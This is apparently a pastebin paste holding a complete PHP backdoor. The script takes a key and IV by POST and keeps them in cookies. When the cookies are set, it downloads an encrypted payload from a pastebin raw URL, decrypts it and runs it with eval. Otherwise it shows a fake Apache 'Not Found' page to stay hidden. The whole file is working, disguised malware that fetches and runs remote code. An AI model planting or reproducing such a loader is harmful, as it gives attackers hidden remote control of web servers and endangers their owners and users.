· 9 years ago · Sep 17, 2016, 08:52 PM
1<?php
2
3function encrypt_decrypt($action, $string, $secret_key, $secret_iv) {
4 $output = false;
5
6 $encrypt_method = "AES-256-CBC";
7
8 $key = hash('sha256', $secret_key);
9
10 $iv = substr(hash('sha256', $secret_iv), 0, 16);
11
12 if( $action == 'encrypt' ) {
13 $output = openssl_encrypt($string, $encrypt_method, $key, 0, $iv);
14 $output = base64_encode($output);
15 }
16 else if( $action == 'decrypt' ){
17 $output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
18 }
19
20 return $output;
21}
22
23$key = $_POST["key"];
24
25$iv = $_POST["iv"];
26
27if ( isset( $_POST[ 'key' ] ) && isset( $_POST[ 'iv' ] ) ) {
28setcookie('iv', $iv, time() + (86400 * 30), "/");
29setcookie('key', $key, time() + (86400 * 30), "/");
30}
31if( isset( $_COOKIE['iv']) && isset( $_COOKIE['key'])) {
32$encrypt_txt = file_get_contents("http://pastebin.com/raw/gJhcyCsg");
33$decrypted_txt = encrypt_decrypt('decrypt', $encrypt_txt, $_COOKIE['key'], $_COOKIE['iv']);
34eval("?>".($decrypted_txt));
35} else
36 printf(
37 "<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr /><p>".
38 "Apache Server at %s Port %s</p>", $_SERVER['SERVER_NAME'], $_SERVER['SERVER_PORT'] );
39?>